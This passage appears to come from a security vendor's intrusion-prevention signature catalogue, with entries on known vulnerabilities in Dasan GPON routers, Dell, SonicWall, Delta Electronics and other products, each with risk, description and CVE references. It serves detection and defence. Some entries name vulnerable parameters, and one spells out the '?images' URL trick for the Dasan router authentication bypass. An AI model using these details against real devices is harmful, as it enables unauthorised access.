Description:	DarkVNC is a remote access trojan capable to create hidden VNC sessions on Windows computers. This situation may also trigger on other hVNC variants.
Situation:	Generic_TCP-DarkVNC-C2-Traffic

Darwin-Streaming-Server-Null-Byte

About this vulnerability:

A Null byte handling vulnerability in RTSP server

Risk:

Moderate

First detected in:

sgpkg-ips-279-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Darwin Streaming Server

Type:

Malfunction

Description:

Darwin Streaming Server 5.0.1, and possibly earlier versions, allows remote attackers to cause a denial of service via a DESCRIBE request with a location that contains a null byte.

Situation:

Generic_Darwin-Streaming-Server-Null-Byte-DoS

References:

CVE-2004-1123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1123

Dasan-GPON-Router-Command-Injection

About this vulnerability:

A vulnerability in Dasan GPON routers

Risk:

High

First detected in:

sgpkg-ips-1374-5242

Last changed:

sgpkg-ips-1374-5242

Platform:

Generic

Software:

Dasan GPON

Type:

Input Validation

Description:

There exists a command injection vulnerability in Dasan GPON routers. A successful exploitation can allow unauthenticated attacker to run arbitrary commands via the dest_host parameter.

Situation:

HTTP_CRL-Dasan-GPON-Router-Command-Injection

References:

CVE-2018-10562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10562

Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561

About this vulnerability:

An attempt to exploit a vulnerability in Dasan GPON routers detected

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Generic

Software:

Dasan GPON

Type:

Input Validation

Description:

An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication. One can then manage the device.

Situation:

HTTP_CRL-Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561

References:

CVE-2018-10561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10561

Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods

About this vulnerability:

A vulnerability in Data Dynamics ActiveBar

Risk:

High

First detected in:

sgpkg-ips-583-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Data Dynamics ActiveBar

Type:

Input Validation

Description:

There is a vulnerability in Data Dynamics ActiveBar. The vulnerability is due to insecure methods "Save()", "SaveLayoutChanges()", and "SaveMenuUsageData()" in the "ActiveBar3Library.ActiveBar3.3" ("actbar.ocx") ActiveX control that write to a file specified as an argument. Remote attackers could exploit this vulnerability to overwrite arbitrary files on the system in the context of the logged in user.

Situation:

File-Text_Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods

References:

CVE-2007-3883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3883

BID-24959
http://www.securityfocus.com/bid/24959

OSVDB-37692
http://www.osvdb.org/37692

DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in DATAC Control RealWin SCADA System

Risk:

High

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP

Software:

DATAC Control RealWin SCADA System

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the DATAC Control RealWin SCADA System server product. The vulnerability is due to a boundary error while parsing a crafted value in a FC_INFOTAG/SET_CONTROL packet. Remote unauthenticated attackers could exploit this vulnerability by sending a malicious packet to the target server. A successful exploit can allow execution of arbitrary code with the privileges of the affected service, normally Administrator privileges on Windows systems, or cause a Denial of Service condition due to abnormal termination of the service.

Situation:

Generic_CS-DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-BOF

References:

CVE-2008-4322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4322

BID-31418
http://www.securityfocus.com/bid/31418

DataLife-Engine-PHP-Code-Injection

About this vulnerability:

A DataLife Engine PHP Code Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-781-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

DataLife Engine

Type:

PHP Injection

Description:

A vulnerability in DataLife Engine, vesion 9.7, which allows remote attackers to inject and execute arbitrary PHP code through the catlist and not-catlist tags in preview.php.

Situation:

HTTP_CRL-DataLife-Engine-PHP-Code-Injection

References:

CVE-2013-1412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1412

BID-57603
http://www.securityfocus.com/bid/57603

OSVDB-89662
http://www.osvdb.org/89662

DC/OS-Marathon-UI-Docker-Exploit

About this vulnerability:	A DC/OS Marathon UI Docker Exploit vulnerability
Risk:	High
First detected in:	sgpkg-ips-1028-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	DCOS Marathon
Type:	Input Validation
Description:	A vulnerability in DC/OS which allows remote attackers to create a Docker container with the '/' path mounted with read/write permissions on the host server.
Situation:	HTTP_CRL-DC/OS-Marathon-UI-Docker-Exploit

DCOM-RPC-BOF-MS03-026

About this vulnerability:

RPC DCOM interface buffer overflow vulnerability (MS03-026)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT; Windows XP; Windows 2003; Windows 2000

Software:

Windows DCOM RPC Service

Type:

Buffer Overflow

Description:

The RPC DCOM interface suffers from a weakness in the object activation request handling. When exploited successfully the vulnerability allows remote code execution with system privileges through a buffer overflow. Exploits are widely available in the Internet. The Blaster/MSblast/LovSAN and Nachi/Welchia worms exploit this vulnerability.

Situation:

MSRPC-TCP_CPS-DCOM-RPC-Servername-BOF
MSRPC-UDP_CPS-DCOM-RPC-Servername-BOF

References:

CVE-2003-0352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352

BID-8205
http://www.securityfocus.com/bid/8205

OSVDB-2100
http://www.osvdb.org/2100

MS03-026
http://technet.microsoft.com/security/bulletin/MS03-026

DCOM-Rpcss-Heap-BO-MS03-039

About this vulnerability:

Remote exploitable heap bufferoverflow in DCOM RPCSS (MS03-039)

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows NT 4.0; Windows 2000; Windows XP; Windows 2003

Software:

Windows DCOM RPC Service

Type:

Buffer Overflow

Description:

The filename parameter length check in the Windows RPC DCOM interface handling is not carried out. A heap overflow can be caused by a large parameter crashing the RpcSS service. Attackers using suitable data can run arbitary code with Local System privilege.

Situation:

MSRPC-TCP_CPS-DCOM-Rpcss-Long-Filename-BOF

References:

CVE-2003-0528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0528

BID-8459
http://www.securityfocus.com/bid/8459

OSVDB-2535
http://www.osvdb.org/2535

MS03-039
http://technet.microsoft.com/security/bulletin/MS03-039

DD-WRT-Arbitrary-Command-Execution

About this vulnerability:

A DD-WRT-Arbitrary Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-725-5211

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

DD-WRT

Type:

Input Validation

Description:

A vulnerability in the DD-WRT firmware version v24-sp1 which allows remote attackers to execute arbitrary commands via metacharacters in a HTTP GET request to /cgi-bin/.

References:

CVE-2009-2765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2765

BID-35742
http://www.securityfocus.com/bid/35742

OSVDB-55990
http://www.osvdb.org/55990

Ddoser-Bot

About this vulnerability:	DDoser Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	DDoser is a Bot that is used to perform Distributed Denial of Service attacks.
Situation:	HTTP_CRL-Ddoser-Bot-Traffic

Debian-Installation-Package

About this vulnerability:	Debian binary installation package
Risk:	Low
First detected in:	sgpkg-ips-179-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Debian GNU/Linux; Ubuntu Linux
Software:	<os>
Type:	Insecure Configuration
Description:	The Debian GNU/Linux distribution, as well as other Linux distributions that are based on Debian, such as Ubuntu, use specific binary packages for application installation. These installation packages can be used to import executable content into the target system.
Situation:	HTTP_SS-Debian-Binary-Installation-Package-Download File-Binary_Debian-Binary-Installation-Package

Default-User-And-Password

About this vulnerability:

Default user and password vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

IRIX

Software:

<os>

Type:

Insecure Configuration

Description:

Some older Irix operating systems have a default usernames. Is possible to remotely login to these accounts thus compromising the host

Situation:

FTP_CS-Default-IRIX-Account-OutOfBox
FTP_CS-Default-IRIX-Account-4dgifts
FTP_CS-Default-IRIX-Account-Ezsetup
FTP_CS-Default-IRIX-Account-Guest
Telnet_CTS-Default-IRIX-Account-OutOfBox
Telnet_CTS-Default-IRIX-Account-4dgifts
Telnet_CTS-Default-IRIX-Account-Ezsetup
Telnet_CTS-Default-IRIX-Account-Guest

References:

CVE-1999-0502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502

Delegate-Proxy-Buffer-Overflow

About this vulnerability:

FreeBSD Delegate Proxy Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

FreeBSD

Software:

Delegate Proxy

Type:

Buffer Overflow

Description:

The FreeBSD Delegate Proxy (a third-party application) suffers from multiple buffer overflow bugs, which can be exploited to gain the privileges of the proxy (default is nobody).

Situation:

Generic_CS-FreeBSD-Delegate-Proxy-BOF-1
Generic_CS-FreeBSD-Delegate-Proxy-BOF-2

References:

CVE-2000-0165
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0165

Delfin-Media-Viewer

About this vulnerability:	Delfin Media Viewer browser plugin
Risk:	Low
First detected in:	sgpkg-ips-33-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Delfin Media Viewer
Type:	Misconfiguration
Description:	Delfin Media Viewer is a browser plugin and may be considered unwanted software by some organizations. It displays advertisements.
Situation:	HTTP_CSH-Delfin-Media-Viewer-g181511-User-Agent HTTP_CSH-Media-Viewer-StubInstStat-User-Agent HTTP_CSH-Delfin-Media-Viewer-PromulGate-User-Agent

Dell-EMC-iDRAC-Cgi-Injection-CVE-2018-1207

About this vulnerability:

A vulnerability in Dell EMC iDRAC

Risk:

High

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1640-5242

Platform:

Generic

Software:

Dell EMC iDRAC

Type:

Malfunction

Description:

There exists a CGI injection vulnerability in Dell EMC iDRAC. Successful exploitation could lead in remote code execution.

Situation:

HTTP_URI-Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution

References:

CVE-2018-1207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1207

Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal

About this vulnerability:

A vulnerability in Dell Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1045-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell Storage Manager

Type:

Input Validation

Description:

Improper request validation causes a directory traverstal vulnerability in Dell EMC Storage Manager. A successful exploit allows an attacker to disclose arbitrary files on the target system.

Situation:

HTTP_CSU-Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal

References:

CVE-2017-14384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14384

Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass

About this vulnerability:

A vulnerability in EMC Dell EMC Solutions Enabler Virtual Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1080-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell EMC Solutions Enabler Virtual Appliance; Dell EMC Unisphere for VMAX Virtual Appliance; Dell EMC VASA Virtual Appliance; Dell EMC VMAX Embedded Management

Type:

Malfunction

Description:

There has been reported an authentication bypass vulnerability in Dell EMC VMAX Virtual Appliance (vApp). A remote unauthenticated attacker can exploit the vulnerability by authenticating to the target service with undocumented credentials. This vulnerability can be chained with CVE-2018-1215, which leads in arbitrary code execution.

Situation:

HTTP_CRL-Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass

References:

CVE-2018-1216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1216

Dell-NetVault-Backup-Denial-Of-Service

About this vulnerability:

A vulnerability in Dell NetVault Backup

Risk:

High

First detected in:

sgpkg-ips-675-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell NetVault Backup

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in Dell NetVault Backup. The vulnerability is due to an assertion failure when processing specially crafted data sent to TCP port 20031. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service condition on the target system.

Situation:

Generic_CS-Dell-NetVault-Backup-Denial-Of-Service

References:

CVE-2015-5696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5696

Dell-OpenManage-Network-Manager-MySQL-Improper-Access-Control

About this vulnerability:

A vulnerability in Dell OpenManage Network Manager

Risk:

High

First detected in:

sgpkg-ips-1119-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell OpenManage

Type:

Malfunction

Description:

An improper access control vulnerability has been reported in Dell OpenManage Network Manager. The vulnerability is due to a combination of exposing the MySQL daemon on the public network interface, the existence of default credentials and an insecure configuration allowing read/write access to the filesystem from MySQL. A remote, unauthenticated user could exploit this vulnerability by connecting to the MySQL service on a target server using the default credentials. Successful exploitation of the vulnerabilities could lead to the execution of arbitrary SQL commands under the security context of root.

Situation:

MySQL_CS-Dell-OpenManage-Network-Manager-MySQL-Improper-Access-Control

References:

CVE-2018-15768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15768

Dell-OpenManage-Web-Server-Buffer-Overflow

About this vulnerability:

A vulnerability in Dell OpenManage Server

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Dell OpenManage

Type:

Buffer Overflow

Description:

A buffer overflow exists in Dell's OpenManage Web Server product that may allow remote attackers to cause a denial of service condition or inject arbitrary code.

Situation:

Generic_CS-Dell-OpenManage-Web-Server-Buffer-Overflow

References:

CVE-2004-0331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0331

BID-9750
http://www.securityfocus.com/bid/9750

Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection

About this vulnerability:

A vulnerability in Dell ScriptLogic Asset Manager

Risk:

High

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell ScriptLogic Asset Manager

Type:

SQL Injection

Description:

An SQL Injection vulnerability exists in Dell ScriptLogic Asset Manager. The vulnerability is due to insufficient input validation while processing requests to GetClientPackage.aspx. By sending crafted HTTP requests, a unauthenticated, remote attacker can exploit this vulnerability to execute code under the security context of the Network Service account.

Situation:

HTTP_CSU-Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection

References:

CVE-2015-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1605

OSVDB-118627
http://www.osvdb.org/118627

Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection

About this vulnerability:

A vulnerability in Dell ScriptLogic Asset Manager

Risk:

High

First detected in:

sgpkg-ips-636-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell ScriptLogic Asset Manager

Type:

SQL Injection

Description:

An SQL Injection vulnerability exists in Dell ScriptLogic Asset Manager. The vulnerability is due to insufficient input validation while processing requests to GetProcessedPackage.aspx. By sending crafted HTTP requests, an unauthenticated, remote attacker can exploit this vulnerability to execute code under the security context of the Network Service account.

Situation:

HTTP_CRL-Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection

References:

CVE-2015-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1605

BID-72697
http://www.securityfocus.com/bid/72697

OSVDB-118628
http://www.osvdb.org/118628

Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure

About this vulnerability:	A vulnerability in Dell SonicWALL GMS
Risk:	Moderate
First detected in:	sgpkg-ips-850-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SonicWall GMS; SonicWall Analyzer
Type:	Malfunction
Description:	Improper access control of the license.jsp page on Dell SonicWALL results in an information disclosure vulnerability, which an attacker can use to gain access to sensitive data.
Situation:	HTTP_CSU-Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure

Dell-SonicWall-Scrutinizer-methodDetail-SQL-Injection

About this vulnerability:

A Dell SonicWall Scrutinizer methodDetail SQL Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-781-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SonicWALL Scrutinizer

Type:

SQL Injection

Description:

A vulnerability in Dell SonicWALL Scrutinizer, vesion 11.01, which allows remote attackers to write arbitrary files and execute remote code via an SQL injection to the methodDetail parameter in exporters.php.

Situation:

HTTP_CS-Dell-SonicWall-Scrutinizer-SQL-Injection

References:

CVE-2014-4977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4977

BID-68495
http://www.securityfocus.com/bid/68495

Dell-SonicWall-Scrutinizer-SQL-Injection

About this vulnerability:

A Dell SonicWall Scrutinizer SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SonicWALL Scrutinizer

Type:

SQL Injection

Description:

A vulnerability in SonicWALL Scrutinizer, versions before 9.5.2, in d4d/statusFilter.php, which allows remote attackers to execute arbitrary SQL commands via the q parameter.

Situation:

HTTP_CS-Dell-SonicWall-Scrutinizer-SQL-Injection

References:

CVE-2012-2962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2962

BID-54625
http://www.securityfocus.com/bid/54625

OSVDB-84232
http://www.osvdb.org/84232

Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection

About this vulnerability:	A vulnerability in Dell SonicWALL GMS
Risk:	Moderate
First detected in:	sgpkg-ips-833-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SonicWall GMS
Type:	Input Validation
Description:	Insufficient validation of the logoID parameter in the ImagePreviewServlet function of Dell SonicWALL GMS causes an SQL injection vulnerability. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation:	HTTP_CRL-Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection

Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal

About this vulnerability:

A vulnerability in Dell Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dell Storage Manager

Type:

Input Validation

Description:

Improper validation of HTTP requests causes a directory traversal vulnerability in Dell Storage Manager. A successful attack allows arbitrary files to be read from the target system.

Situation:

HTTP_CSU-Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal

References:

CVE-2017-10949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10949

Delta-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Electronics CNCSoft

Risk:

Moderate

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

Improper handling of the GIFFILE element in DPB files causes a stack buffer overflow in Delta Electronics CNCSoft. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow

References:

CVE-2020-7002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7002

Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Electronics CNCSoft ScreenEditor.

Risk:

High

First detected in:

sgpkg-ips-1469-5242

Last changed:

sgpkg-ips-1469-5242

Platform:

Windows

Software:

Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability in Delta Electronics CNCSoft ScreenEditor, versions 1.01.30 and prior, which allows remote attackers to execute arbitrary code by enticing a target user into opening a crafted DPB file, due to lack of proper validation of the length of user-supplied data prior to copying to a fixed-length stack buffer.

Situation:

File-Binary_Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow

References:

CVE-2021-43982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43982

Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Industrial Automation CNCSoft ScreenEditor.

Risk:

High

First detected in:

sgpkg-ips-1398-5242

Last changed:

sgpkg-ips-1398-5242

Platform:

Generic

Software:

Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

A vulnerability in Delta Industrial Automation CNCSoft ScreenEditor, versions before 1.01.30, which allows remote attackers to execute arbitrary code by by enticing a target user into opening a crafted DPB file, due to improper handling of Element Section in DPB files.

Situation:

File-Binary_Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow

References:

CVE-2021-22672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22672

Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Electronics ScreenEditor

Risk:

Moderate

First detected in:

sgpkg-ips-1562-5242

Last changed:

sgpkg-ips-1562-5242

Platform:

Generic

Software:

Delta Electronics ScreenEditor; Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in Delta Electronics CNCSoft ScreenEditor module. The vulnerability is due to lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack buffer. A remote attacker can exploit this vulnerability by enticing a target user into previewing a crafted DPB file. Successfully exploiting this vulnerability could result in denial of service or, in the worst case, arbitrary code execution.

Situation:

File-Binary_Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow

References:

CVE-2022-4634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4634

Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Electronics Industrial Automation COMMGR

Risk:

Moderate

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Delta Electronics Industrial Automation COMMGR

Type:

Buffer Overflow

Description:

Improper handling of a length value causes a buffer overflow vulnerability in Delta Electronics Industrial Automation COMMGR. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow

References:

CVE-2018-10594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10594

Delta-Electronics-Infrasuite-Device-Master-Activemq-Insecure-Deserialization

About this vulnerability:

A vulnerability in Delta Electronics InfraSuite Device Master

Risk:

High

First detected in:

sgpkg-ips-1632-5242

Last changed:

sgpkg-ips-1632-5242

Platform:

Generic

Software:

Delta Electronics InfraSuite Device Master

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Delta Electronics InfraSuite Device Master. The vulnerabilities is due to input validation error within the installed instance of Apache ActiveMQ. A remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of the administrator.

Situation:

Generic_CS-Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization

References:

CVE-2023-1133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1133

Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization

About this vulnerability:

A vulnerability in Delta Electronics InfraSuite Device Master

Risk:

High

First detected in:

sgpkg-ips-1536-5242

Last changed:

sgpkg-ips-1536-5242

Platform:

Generic

Software:

Delta Electronics InfraSuite Device Master

Type:

Input Validation

Description:

An insecure deserialization vulnerability exists in Delta Electronics InfraSuite Device Master. The vulnerability is due to missing input validation when processing messages sent to Device-DataCollect service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted request to the target server. Successful exploitation allows arbitrary code execution with privileges of the user running the vulnerable software.

Situation:

References:

CVE-2022-38142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38142

Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization

About this vulnerability:

A vulnerability in Delta Electronics InfraSuite Device Master

Risk:

Moderate

First detected in:

sgpkg-ips-1805-5242

Last changed:

sgpkg-ips-1805-5242

Platform:

Generic

Software:

Delta Electronics InfraSuite Device Master

Type:

Input Validation

Description:

Insecure deserialization of JSON objects in the _gExtraInfo JSON key causes a vulnerability in Delta Electronics InfraSuite Device Master. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization

References:

CVE-2024-10456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10456

Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal

About this vulnerability:

A vulnerability in Delta Electronics InfraSuite Device Master

Risk:

High

First detected in:

sgpkg-ips-1568-5242

Last changed:

sgpkg-ips-1568-5242

Platform:

Generic

Software:

Delta Electronics InfraSuite Device Master

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Delta Electronics InfraSuite Device Master. The vulnerability is due to improper processing of opcode 512 request within CtrlLayerNWCmd_FileOperation. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result, in the worst case, remote code execution under the security context of the user running the vulnerable software.

Situation:

Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal

References:

CVE-2022-41657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41657

Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207

About this vulnerability:

A vulnerability in Delta Electronics InfraSuite Device Master

Risk:

High

First detected in:

sgpkg-ips-1749-5242

Last changed:

sgpkg-ips-1749-5242

Platform:

Generic

Software:

Delta Electronics InfraSuite Device Master

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in Delta Electronics InfraSuite Device Master. The vulnerability is due to the insecure deserialization of JSON objects in the fieldExtraInfo JSON key. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution on the target server, under the security context of the user running the Device-DataCollect and Device-Gateway services.

Situation:

HTTP_CS-Delta-Electronics-Infrasuite-Potential-Insecure-Deserialization-CVE-2023-47207
HTTP_CS-Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207

References:

CVE-2023-47207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47207

Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF

About this vulnerability:

A vulnerability in Delta Industrial Automation CNCSoft ScreenEditor.

Risk:

High

First detected in:

sgpkg-ips-1503-5242

Last changed:

sgpkg-ips-1503-5242

Platform:

Generic

Software:

Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability in Delta Industrial Automation CNCSoft ScreenEditor, versions 1.01.31 and prior, which allows remote attackers to execute arbitrary code by sending a crafted DPB file, due to lack of proper validation of the length of user-supplied data prior to copying to a fixed-length stack buffer.

Situation:

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF

References:

CVE-2022-1405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1405

Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF

About this vulnerability:

A vulnerability in Delta Electronics ScreenEditor

Risk:

Moderate

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

A stack-based buffer overflow has been reported in Delta Industrial Automation CNCSoft ScreenEditor. The vulnerability is due to improper parsing of DPB files. An unauthenticated, remote attacker can exploit this vulnerability by enticing a target user into opening a crafted project file. Successful exploitation could result in execution of arbitrary code under the security context of the user running CNCSoft ScreenEditor.

Situation:

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF

References:

CVE-2020-16199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16199

Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Electronics CNCSoft

Risk:

Moderate

First detected in:

sgpkg-ips-1188-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Delta Electronics CNCSoft

Type:

Buffer Overflow

Description:

There has been reported a stack-based buffer overflow in Delta Industrial Automation CNCSoft ScreenEditor. Successful exploitation could lead in arbitrary code execution.

Situation:

File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Stack-Buffer-Overflow

References:

CVE-2019-10947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10947

Delta-Industrial-Automation-Diaenergie-Am_Handler-SQL-Injection

About this vulnerability:

A vulnerability in Delta Electronics DIAEnergie

Risk:

Moderate

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

Input Validation

Description:

